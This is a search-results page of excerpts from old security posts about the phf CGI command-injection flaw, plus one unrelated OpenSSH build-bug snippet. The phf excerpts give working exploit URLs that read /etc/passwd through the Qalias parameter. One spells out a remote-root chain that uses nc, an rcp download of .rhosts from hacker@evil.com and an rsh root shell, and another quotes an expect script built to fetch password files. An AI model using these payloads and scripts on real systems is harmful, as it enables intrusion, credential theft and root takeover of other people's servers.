search for: qalia

https://bugzilla.mindrot.org/show_bug.cgi?id=2315 Bug ID: 2315 Summary: OpenSSH 6.7p1 on AIX 7.1 compile issue Product: Portable OpenSSH Version: 6.7p1 Hardware: PPC OS: AIX Status: NEW Severity: normal Priority: P5 Component: Build system Assignee: unassigned-bugs at

...es. I would imagine that most people are aware of the 0x0A escape and so when they test it on their own box they think they are safe from phf exploitation. The syntax for the exploit is almost identical to the older phf exploit. To execute commands: (cat /etc/passwd) http://server.net/cgi-bin/phf?Qalias=%ffcat%20/etc/passwd I know this exploit isn''t only confided to linux, but it seems its easiest to exploit on linux. If everybody is aware of this, excuse me. It''s just that I dont think enough admins are aware of this, and they are leaving their networks very open for exploita...

...aracter is passed to the phf script, it can execute arbitrary programs as user ''nobody''. So the problem with rcp can be exploited remotely, and root access can be gained from outside, for instance like this: $ echo "+ +" > /tmp/my.rhosts $ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+ /root/.rhosts" | nc -v - 20 victim.com 80 $ rsh -l root victim.com "/bin/sh -i" # The fact that this bug can be exploited remotely makes it, I think, quite serious. We wrote a simple script that searched our home domains (*.cz and *.sk) for m...

...vironment, and maintain a high level of efficiency. A quick look at "fetch.exp" will show you what we mean. ---------------------------------------------------------------------- #!/usr/bin/expect -- # Constant # As a default we query for the passwd file set pwQuery "/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd" # We get the address and port id from the command line set address [lindex $argv 0] if {$argc == 3} { set port [lindex $argv 1] set query [lindex $argv 2] } elseif {$argc == 2} { set port [lindex $argv 1] set query pwQuery } else { set port "8...